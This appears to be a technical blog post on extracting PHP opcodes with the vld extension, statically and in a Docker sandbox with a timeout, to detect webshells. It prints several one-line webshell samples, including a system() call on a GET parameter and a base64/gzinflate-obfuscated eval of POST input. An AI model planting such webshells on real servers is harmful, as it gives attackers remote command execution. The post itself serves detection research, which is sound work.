cdxy.me
Cyber Security / Data Science / Trading

PHP OPCODE

The vld extension

Compile and install vld from source.

apt-get install php7.0-dev
wget http://pecl.php.net/get/vld-0.14.0.tgz
tar -xzvf vld-0.14.0.tgz 
cd vld-0.14.0/
cat README.rst 
which php-config
phpize
./configure --with-php-config=/usr/bin/php-config --enable-vld
make && make install

Activate the vld extension

php --ini                        # locate the php.ini in use
vi /etc/php/7.0/cli/php.ini      # add the line: extension=vld.so
service apache2 restart
php -dvld.active=1 -dvld.execute=0 phpinfo.php
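
Before going further it can help to confirm that the extension actually loaded. The sketch below is an illustration rather than part of the original workflow: it assumes `php -m` prints one module name per line and that `php` is on the PATH, and the helper names `has_module` and `vld_loaded` are hypothetical.

```python
import subprocess


def has_module(modules_text, name="vld"):
    """Return True if `name` appears on its own line in `php -m` style output."""
    wanted = name.lower()
    return any(line.strip().lower() == wanted for line in modules_text.splitlines())


def vld_loaded(php_binary="php"):
    """Run `php -m` and report whether vld is listed (assumes php is on PATH)."""
    out = subprocess.run([php_binary, "-m"], stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT, universal_newlines=True).stdout
    return has_module(out)
```

Keeping the text check separate from the `php` call means it can be exercised on captured output without a PHP install.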

Static opcode

Extract opcodes from a PHP file.

root@iZuf6j6dqpyhy2b4on2e0sZ:/var/www/html# cat shell.php
<?php

echo system($_GET['cdxy']);
root@iZuf6j6dqpyhy2b4on2e0sZ:/var/www/html# php -dvld.active=1 -dvld.execute=0 shell.php
Finding entry points
Branch analysis from position: 0
Jump found. (Code = 62) Position 1 = -2
filename:       /var/www/html/shell.php
function name:  (null)
number of ops:  7
compiled vars:  none
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   3     0  E >   INIT_FCALL                                               'system'
         1        FETCH_R                      global              $0      '_GET'
         2        FETCH_DIM_R                                      $1      $0, 'cdxy'
         3        SEND_VAR                                                 $1
         4        DO_ICALL                                         $2      
         5        ECHO                                                     $2
   4     6      > RETURN                                                   1

branch: #  0; line:     3-    4; sop:     0; eop:     6; out1:  -2
path #1: 0, 

  • Script that statically extracts opcodes to files
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import hashlib
import os
import re
import subprocess
import sys


def get_opcode(file_path):
    # Ask vld to dump the compiled opcodes without executing the script.
    cmd = ['php', '-dvld.active=1', '-dvld.execute=0', file_path]
    proc = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                          universal_newlines=True)
    # Pull the opcode names out of the "op" column of the dump.
    return re.findall(r'\d+[\s\*\>]+([A-Z_]{2,})\s', proc.stdout)


def load_files_opcode_re(target_dir, output_dir):
    # Walk target_dir and write one "<md5 of path>.opcode" file per PHP file.
    for path, d, filelist in os.walk(target_dir):
        for filename in filelist:
            if filename.endswith('.php'):
                fullpath = os.path.join(path, filename)
                file_md5 = hashlib.md5(os.fsencode(fullpath)).hexdigest()
                opcode = ' '.join(get_opcode(fullpath))
                with open(os.path.join(output_dir, file_md5 + '.opcode'), 'w') as output:
                    output.write(opcode)


if __name__ == '__main__':
    load_files_opcode_re(sys.argv[1], sys.argv[2])
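
Run against the shell.php dump shown earlier, the pattern in `get_opcode` returns six names rather than seven. On the entry row the `E` flag sits between the op index and `INIT_FCALL`, and `E` is not in the pattern's character class, so that row does not match. Whether this matters depends on how the features are used downstream. The sketch below reproduces the behavior and shows one possible token-based alternative; `parse_ops` is a hypothetical helper, not the author's code.

```python
import re

# Op rows copied from the shell.php dump above.
SAMPLE = """\
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   3     0  E >   INIT_FCALL                                               'system'
         1        FETCH_R                      global              $0      '_GET'
         2        FETCH_DIM_R                                      $1      $0, 'cdxy'
         3        SEND_VAR                                                 $1
         4        DO_ICALL                                         $2
         5        ECHO                                                     $2
   4     6      > RETURN                                                   1
"""

# The pattern used by get_opcode in the script above.
ORIGINAL = re.compile(r'\d+[\s\*\>]+([A-Z_]{2,})\s')


def parse_ops(dump):
    """Return the op name of every op row, including rows carrying the E flag."""
    ops = []
    for line in dump.splitlines():
        tokens = line.split()
        # Op rows start with an integer (source line number or op index).
        if not tokens or not tokens[0].isdigit():
            continue
        for tok in tokens[1:]:
            # The first all-caps token of two or more characters is the op name;
            # the single-letter E flag and the > markers are skipped.
            if re.fullmatch(r'[A-Z_]{2,}', tok):
                ops.append(tok)
                break
    return ops


if __name__ == '__main__':
    print(ORIGINAL.findall(SAMPLE))  # six names, INIT_FCALL is missing
    print(parse_ops(SAMPLE))         # seven names
```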

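Dynamic opcode

Dynamic opcode extraction in a sandbox is needed to identify webshells that are encoded, obfuscated, or encrypted.

Example

The original webshell code is shown below. Without decoding and executing it dynamically, there is no way to tell whether the code passed to eval contains an attacker-controllable input.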

<?php
eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVq8qLc5IzUtXj9W0BgA=')));
?>
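
For this particular sample the wrapping is shallow enough to undo offline, which makes it clearer what a dynamic run has to recover. The sketch below assumes that PHP's `gzinflate` corresponds to a raw DEFLATE stream, which Python's `zlib` reads when given a negative `wbits`; the function name is hypothetical. Real samples often stack custom or keyed transformations, where this kind of manual unwrapping does not scale.

```python
import base64
import zlib

PAYLOAD = 'Sy1LzNFQiQ/wDw6JVq8qLc5IzUtXj9W0BgA='


def php_gzinflate_base64(payload):
    """Mirror gzinflate(base64_decode($payload)) for a raw-DEFLATE payload."""
    raw = base64.b64decode(payload)
    # wbits=-15 tells zlib to expect a raw DEFLATE stream with no header.
    return zlib.decompress(raw, -15).decode('utf-8', errors='replace')


if __name__ == '__main__':
    print(php_gzinflate_base64(PAYLOAD))  # eval($_POST['zusheng']);
```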

Static opcode result

root@iZuf6j6dqpyhy2b4on2e0sZ:~/webshell_predict/webshell_bypass# cat base64.php
<?php
eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVq8qLc5IzUtXj9W0BgA=')));
?>
root@iZuf6j6dqpyhy2b4on2e0sZ:~/webshell_predict/webshell_bypass# opcode base64.php 
Finding entry points
Branch analysis from position: 0
Jump found. (Code = 62) Position 1 = -2
filename:       /root/webshell_predict/webshell_bypass/base64.php
function name:  (null)
number of ops:  8
compiled vars:  none
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   2     0  E >   INIT_FCALL                                               'gzinflate'
         1        INIT_FCALL                                               'base64_decode'
         2        SEND_VAL                                                 'Sy1LzNFQiQ%2FwDw6JVq8qLc5IzUtXj9W0BgA%3D'
         3        DO_ICALL                                         $0      
         4        SEND_VAR                                                 $0
         5        DO_ICALL                                         $1      
         6        INCLUDE_OR_EVAL                                          $1, EVAL
   4     7      > RETURN                                                   1

branch: #  0; line:     2-    4; sop:     0; eop:     7; out1:  -2
path #1: 0, 

Dynamic opcode result

root@iZuf6j6dqpyhy2b4on2e0sZ:~/webshell_predict/webshell_bypass# oprun base64.php 
Finding entry points
Branch analysis from position: 0
Jump found. (Code = 62) Position 1 = -2
filename:       /root/webshell_predict/webshell_bypass/base64.php
function name:  (null)
number of ops:  8
compiled vars:  none
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   2     0  E >   INIT_FCALL                                               'gzinflate'
         1        INIT_FCALL                                               'base64_decode'
         2        SEND_VAL                                                 'Sy1LzNFQiQ%2FwDw6JVq8qLc5IzUtXj9W0BgA%3D'
         3        DO_ICALL                                         $0      
         4        SEND_VAR                                                 $0
         5        DO_ICALL                                         $1      
         6        INCLUDE_OR_EVAL                                          $1, EVAL
   4     7      > RETURN                                                   1

branch: #  0; line:     2-    4; sop:     0; eop:     7; out1:  -2
path #1: 0, 
Finding entry points
Branch analysis from position: 0
Jump found. (Code = 62) Position 1 = -2
filename:       /root/webshell_predict/webshell_bypass/base64.php(2) : eval()'d code
function name:  (null)
number of ops:  4
compiled vars:  none
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   1     0  E >   FETCH_R                      global              $0      '_POST'
         1        FETCH_DIM_R                                      $1      $0, 'zusheng'
         2        INCLUDE_OR_EVAL                                          $1, EVAL
         3      > RETURN                                                   null

branch: #  0; line:     1-    1; sop:     0; eop:     3; out1:  -2
path #1: 0, 
PHP Notice:  Undefined index: zusheng in /root/webshell_predict/webshell_bypass/base64.php(2) : eval()'d code on line 1

Notice: Undefined index: zusheng in /root/webshell_predict/webshell_bypass/base64.php(2) : eval()'d code on line 1

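The output shows the opcodes PHP emitted before raising the error. They already include a fetch of the global variable _POST, and the execution flow passes that value straight into eval, so the file can be classified directly as a small one-line webshell.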
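
The judgment described here can be approximated mechanically. The sketch below is one hypothetical heuristic, not the author's classifier: it splits a vld dump into op arrays at each `Finding entry points` marker and reports the arrays whose `filename:` line marks them as `eval()'d code` and which fetch a request superglobal. The sample string abbreviates the dump above, and the names `split_op_arrays` and `suspicious_eval_arrays` are made up for illustration.

```python
import re

SUPERGLOBALS = ("'_GET'", "'_POST'", "'_REQUEST'", "'_COOKIE'")

# Abbreviated copy of the dynamic dump above (two op arrays).
SAMPLE = """\
Finding entry points
filename:       /root/webshell_predict/webshell_bypass/base64.php
         6        INCLUDE_OR_EVAL                                          $1, EVAL
Finding entry points
filename:       /root/webshell_predict/webshell_bypass/base64.php(2) : eval()'d code
   1     0  E >   FETCH_R                      global              $0      '_POST'
         1        FETCH_DIM_R                                      $1      $0, 'zusheng'
         2        INCLUDE_OR_EVAL                                          $1, EVAL
"""


def split_op_arrays(dump):
    """Split a vld dump into (filename, body) pairs, one per compiled op array."""
    arrays = []
    for chunk in dump.split('Finding entry points')[1:]:
        match = re.search(r'^filename:\s+(.*)$', chunk, re.MULTILINE)
        arrays.append((match.group(1).strip() if match else '', chunk))
    return arrays


def suspicious_eval_arrays(dump):
    """Return filenames of eval()'d op arrays that read a request superglobal."""
    hits = []
    for filename, body in split_op_arrays(dump):
        reads_input = 'FETCH_R' in body and any(name in body for name in SUPERGLOBALS)
        if "eval()'d code" in filename and reads_input:
            hits.append(filename)
    return hits
```

A substring check like this is deliberately crude; it ignores data flow between the fetch and the eval, so it is a starting point for triage rather than a verdict.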

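Sandbox

  1. Because the code being executed is untrusted and PHP can damage the host system, an isolated environment with snapshot capability is required.
  2. Because the code may contain infinite loops or destructive attacks, timeout logic must be added.
  3. The input is a local file; the output is that file's dynamic opcode dump.

Docker-based sandbox

Environment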

apt-get install docker.io

Relying on Docker's virtualization capabilities, package the PHP environment and the vld extension into a Dockerfile.

mkdir docker
cd docker 
vi Dockerfile

The Dockerfile contents are as follows:

FROM ubuntu:16.04
RUN apt-get update && apt-get -y install php7.0-dev wget \
    && wget http://pecl.php.net/get/vld-0.14.0.tgz \
    && tar -xzvf vld-0.14.0.tgz \
    && cd vld-0.14.0 \
    && phpize \
    && ./configure --with-php-config=/usr/bin/php-config --enable-vld \
    && make && make install \
    && echo "extension=vld.so" >> /etc/php/7.0/cli/php.ini
CMD php -dvld.active=1 -dvld.execute=1 /file/1.php

The RUN instruction builds the environment; the CMD instruction extracts the dynamic opcodes of /file/1.php when the container runs.

Build the image

docker build -t php_vld .
root@iZj6ccwgu73ligyn42bic9Z:~/docker# docker image ls
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
php_vld             latest              458eeb23f1a8        15 minutes ago      452 MB
ubuntu              16.04               20c44cd7596f        3 weeks ago         123 MB

Run

Each run of the image only needs a different local file (the webshell sample) mounted at /file/1.php. The -it flags are also required to get the container's output.

root@iZj6ccwgu73ligyn42bic9Z:~/docker# docker run -it -v /root/docker/shell.php:/file/1.php php_vld
Finding entry points
Branch analysis from position: 0
Jump found. (Code = 62) Position 1 = -2
filename:       /file/1.php
function name:  (null)
number of ops:  4
compiled vars:  none
line     #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   1     0  E >   FETCH_R                      global              $0      '_GET'
         1        FETCH_DIM_R                                      $1      $0, 1
         2        INCLUDE_OR_EVAL                                          $1, EVAL
   2     3      > RETURN                                                   1

branch: #  0; line:     1-    2; sop:     0; eop:     3; out1:  -2
path #1: 0, 
PHP Notice:  Undefined offset: 1 in /file/1.php on line 1
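
Since the container runs untrusted code, the `docker run` invocation could be tightened a little. The sketch below only builds the argument list. `--rm`, `--network none` and the `:ro` mount suffix are standard Docker options, but they are additions that the original post does not use, and `build_run_cmd` is a hypothetical helper.

```python
import os


def build_run_cmd(sample_path, image='php_vld'):
    """Build a `docker run` argv that mounts one sample at /file/1.php."""
    abs_path = os.path.abspath(sample_path)
    return [
        'docker', 'run',
        '-it',                  # as in the post, so the dump reaches the caller
        '--rm',                 # assumption: discard the container afterwards
        '--network', 'none',    # assumption: the sample gets no network access
        '-v', '{}:/file/1.php:ro'.format(abs_path),  # assumption: read-only mount
        image,
    ]
```

Passing the command as a list to `subprocess` instead of a shell string also avoids quoting problems when a sample has spaces or shell metacharacters in its name.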

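In addition, to give the sandbox its timeout logic, the automation script launches the Linux command above through Popen and enforces a timeout threshold.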

import time
from subprocess import PIPE, Popen


def get_opcode_raw(abs_path):
    # Mount the sample at /file/1.php and let the php_vld image dump its opcodes.
    return sys_command_outstatuserr('docker run -it -v {}:/file/1.php php_vld'.format(abs_path))


def sys_command_outstatuserr(cmd, timeout=1):
    # Run cmd through the shell; return its stdout, or 'timeout' once the limit passes.
    p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True, universal_newlines=True)
    t_beginning = time.time()
    while True:
        if p.poll() is not None:
            res = p.communicate()
            # exitcode = p.poll() if p.poll() else 0
            return res[0]  # , exitcode, res[1]
        seconds_passed = time.time() - t_beginning
        if timeout and seconds_passed > timeout:
            p.terminate()
            # out, exitcode, err = '', 128, 'timeout'
            return 'timeout'
        time.sleep(0.1)
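
On Python 3.5 or later the same timeout logic can be expressed with `subprocess.run`, which raises `subprocess.TimeoutExpired` and kills the child process once the limit passes. This is an alternative sketch under that assumption, not the script used in the post; `run_with_timeout` is a hypothetical name, and the demo commands are stand-ins so it runs without Docker.

```python
import subprocess
import sys


def run_with_timeout(argv, timeout=1):
    """Return the combined output of argv, or 'timeout' if it runs too long."""
    try:
        proc = subprocess.run(argv, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                              universal_newlines=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return 'timeout'
    return proc.stdout


if __name__ == '__main__':
    # Stand-in commands: one finishes quickly, one sleeps past the limit.
    print(run_with_timeout([sys.executable, '-c', 'print("ok")'], timeout=10))
    print(run_with_timeout([sys.executable, '-c', 'import time; time.sleep(5)'], timeout=0.5))
```

Note that this only stops the local `docker` client process. The container it started may keep running, so a fuller version would probably also need to stop the container itself.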

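Finally, add one more layer that recursively walks the directory and handles input and output, which completes the batch data extraction.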

import os


def run(abs_dir):
    # Recursively walk abs_dir and print the dynamic opcode dump of every file.
    for path, d, filelist in os.walk(abs_dir):
        for filename in filelist:
            fullpath = os.path.join(path, filename)
            ans = get_opcode_raw(fullpath)
            print(ans)

In testing, the Python script above, running as a single process, handled about 3 files per second on average.
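
Because each file spends most of its time waiting on an external `docker` process, running several extractions concurrently may raise throughput. The sketch below uses a thread pool from `concurrent.futures`. The worker is passed in as a parameter (in the post it would be `get_opcode_raw`), the worker count of 4 is an arbitrary assumption, and no speedup figure is claimed; `list_files` and `run_parallel` are hypothetical names.

```python
import os
from concurrent.futures import ThreadPoolExecutor


def list_files(abs_dir):
    """Collect every file path under abs_dir, like the os.walk loop above."""
    return [os.path.join(path, name)
            for path, _dirs, names in os.walk(abs_dir)
            for name in names]


def run_parallel(abs_dir, extract, workers=4):
    """Apply extract(path) to every file using a pool of worker threads."""
    files = list_files(abs_dir)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        # map() yields results in the same order as `files`.
        return dict(zip(files, pool.map(extract, files)))
```

A call such as `run_parallel('/path/to/samples', get_opcode_raw)` would return a dict mapping each file path to its dump, which is easier to write to disk than printed output.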